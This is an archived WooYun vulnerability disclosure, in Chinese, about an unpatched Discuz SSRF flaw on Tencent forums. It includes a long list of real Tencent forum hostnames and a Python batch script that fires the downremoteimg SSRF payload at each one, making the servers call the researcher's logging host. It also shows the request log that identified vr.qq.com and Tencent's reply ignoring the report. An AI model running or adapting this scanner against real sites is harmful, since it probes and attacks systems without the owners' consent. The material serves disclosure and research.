乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-06-12: 细节已通知厂商并且等待厂商处理中 2016-06-13: 厂商已经主动忽略漏洞,细节向公众公开
批量跑一遍腾讯所有的论坛,论坛那么多,总能捡到一个漏掉的,充当案例
#1 先从搜索引擎和爬虫中找出腾讯使用了Discuz程序的服务器列表
http://fight.gamebbs.qq.comhttp://qqhx.gamebbs.qq.comhttp://bbs.digi.qq.comhttp://bbs.write.qq.comhttp://ff.gamebbs.qq.comhttp://bbs.baby.qq.comhttp://myhn.qq.comhttp://bbs.e.qq.comhttp://tpai.qq.comhttp://bbs.fanli.qq.comhttp://bbs.house.qq.comhttp://xia.gamebbs.qq.comhttp://bbs.cb.qq.comhttp://bbs.ac.qq.comhttp://club.auto.qq.comhttp://bbs.open.qq.comhttp://shouyou.qq.comhttp://bbs.im.qq.comhttp://qqbattle.gamebbs.qq.comhttp://nz.gamebbs.qq.comhttp://xx.gamebbs.qq.comhttp://xb.gamebbs.qq.comhttp://bbs.m.qq.comhttp://forum.discuz.qq.comhttp://bbs.cd.qq.comhttp://myln.qq.comhttp://ktv.gamebbs.qq.comhttp://gf.gamebbs.qq.comhttp://bbs.xian.qq.comhttp://gamebbs.qq.comhttp://ppjz.gamebbs.qq.comhttp://dm.gamebbs.qq.comhttp://ffo.gamebbs.qq.comhttp://sg.gamebbs.qq.comhttp://xb.qq.comhttp://bbs.zt.qq.comhttp://mygd.qq.comhttp://xj.gamebbs.qq.comhttp://xb.qq.com:8080http://bbs.gj.qq.comhttp://bbs.vip.qq.comhttp://bbs.sports.qq.comhttp://bbs.weiqi.qq.comhttp://lol.gamebbs.qq.comhttp://bbs.finance.qq.comhttp://d2.gamebbs.qq.comhttp://fs.gamebbs.qq.comhttp://myfj.qq.comhttp://mysh.qq.comhttp://ch.gamebbs.qq.comhttp://qqxy.gamebbs.qq.comhttp://codol.gamebbs.qq.comhttp://ava.gamebbs.qq.comhttp://fo.gamebbs.qq.comhttp://bbs.lol.qq.comhttp://wang.gamebbs.qq.comhttp://bbs.games.qq.comhttp://bbs.omd.qq.comhttp://tps.gamebbs.qq.comhttp://tiantang2.gamebbs.qq.comhttp://qqgame.gamebbs.qq.comhttp://bbs.yun.qq.comhttp://yl.gamebbs.qq.comhttp://bbs.wifi.qq.comhttp://bns.gamebbs.qq.comhttp://nba2k.gamebbs.qq.comhttp://bbs.blog.qq.comhttp://r2.gamebbs.qq.comhttp://bbs.open.t.qq.comhttp://ld2.gamebbs.qq.comhttp://yu.gamebbs.qq.comhttp://qgamepailei.gamebbs.qq.comhttp://hao.wsq.qq.comhttp://c9.gamebbs.qq.comhttp://ss.gamebbs.qq.comhttp://hxsj.gamebbs.qq.comhttp://bbs.xg.qq.comhttp://x52.gamebbs.qq.comhttp://bbs.book.qq.comhttp://9j.gamebbs.qq.comhttp://speed.gamebbs.qq.comhttp://djt.qq.comhttp://qyzs.gamebbs.qq.comhttp://bbs.auto.qq.comhttp://myhb.qq.comhttp://code.qq.comhttp://bbs.tech.qq.comhttp://wf.gamebbs.qq.comhttp://daoju.gamebbs.qq.comhttp://qqbaby.gamebbs.qq.comhttp://dzs.gamebbs.qq.comhttp://bbs.lady.qq.comhttp://bbs.kid.qq.comhttp://bbs.browser.qq.comhttp://dnf.gamebbs.qq.comhttp://s3.gamebbs.qq.comhttp://sl.gamebbs.qq.comhttp://woz.gamebbs.qq.comhttp://bbs.edu.qq.comhttp://bbs.fj.qq.comhttp://qqtang.gamebbs.qq.comhttp://xxz.gamebbs.qq.comhttp://bbs.pcmgr.qq.comhttp://myxian.qq.comhttp://xiaoyuan.qq.comhttp://mycd.qq.comhttp://cf.gamebbs.qq.comhttp://ug.qq.comhttp://myzj.qq.comhttp://bbs.meishi.qq.comhttp://bbs.astro.qq.comhttp://7.gamebbs.qq.comhttp://3366.gamebbs.qq.comhttp://meng.gamebbs.qq.comhttp://baoshi.gamebbs.qq.comhttp://bbs.guanjia.qq.comhttp://mo.gamebbs.qq.comhttp://bbs.cf.qq.comhttp://bbs.gd.qq.comhttp://bbs.comic.qq.comhttp://vr.qq.comhttp://mycq.qq.comhttp://tiantang.gamebbs.qq.comhttp://bbs.map.qq.comhttp://cheng.gamebbs.qq.comhttp://tnt.gamebbs.qq.comhttp://myhenan.qq.comhttp://xy.gamebbs.qq.comhttp://h2.gamebbs.qq.comhttp://bbs.show.qq.comhttp://bbs.wan.qq.comhttp://bbs.ent.qq.comhttp://qqsh.gamebbs.qq.comhttp://mama.kid.qq.comhttp://bbs.cq.qq.comhttp://bbs.qt.qq.comhttp://age.gamebbs.qq.comhttp://bbs.fashion.qq.comhttp://bbs.v.qq.comhttp://bbs.mail.qq.comhttp://bbs.ms.qq.comhttp://pet.gamebbs.qq.comhttp://bl.gamebbs.qq.comhttp://bbs.hb.qq.comhttp://x.gamebbs.qq.comhttp://bbs.tgp.qq.comhttp://hon.gamebbs.qq.comhttp://jh.gamebbs.qq.comhttp://zg.gamebbs.qq.comhttps://xb.qq.comhttp://9.gamebbs.qq.comhttp://bbs.shang.qq.comhttp://ye.gamebbs.qq.comhttp://bbs.news.qq.comhttp://bbs.qa.qq.comhttp://bbs.chuangshi.qq.comhttp://x5.gamebbs.qq.com
#2 建立批量检测脚本捡漏
#!/usr/bin/env python# encoding: utf-8import urlparseimport randomimport timeimport reimport requestsfrom utils.fileutils import FileUtilsimport requests.packages.urllib3requests.packages.urllib3.disable_warnings()for website in FileUtils.getLines('qqdz.lst'): request = requests.session() try: forumurl = "{website}/forum.php".format(website=website) response = request.get(forumurl, timeout=5, verify=False) formhash = re.findall(r'formhash" value="(.*?)"',response.content) netloc = urlparse.urlparse(website).netloc payload = 'http://fuzz.wuyun.com/404.php?s={netloc}.jpg'.format(netloc=netloc) url = "{website}/forum.php?mod=ajax&action=downremoteimg&formhash={formhash}&message=[img]{payload}[/img]".format( website=website, formhash=formhash[0] if formhash else '', payload=payload) response = request.get(url, timeout=5, verify=False) print url, len(response.content) except Exception, e: print website, e
上面的 fileutils 库在这里http://fuzz.wuyun.org/src/fileutils.py
#3 批量跑一边,在fuzz.wuyun.com的httpd查看请求日志
119.29.69.176 - - [12/Jun/2016:11:00:45 +0800] "GET /404.php?s=vr.qq.com.jpg HTTP/1.1" 404 282 "-" "-"
#4 捡到一个漏打补丁的论坛http://vr.qq.com/forum.php
IP:119.29.69.176广东省广州市 腾讯云计算(北京)有限责任公司 腾讯集团
# 论坛那么多,总有漏掉的案例
危害等级:无影响厂商忽略
忽略时间:2016-06-13 17:23
非常感谢您的报告,经评估该站点已有网络隔离,无法访问公司IDC内网,故此忽略。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。
暂无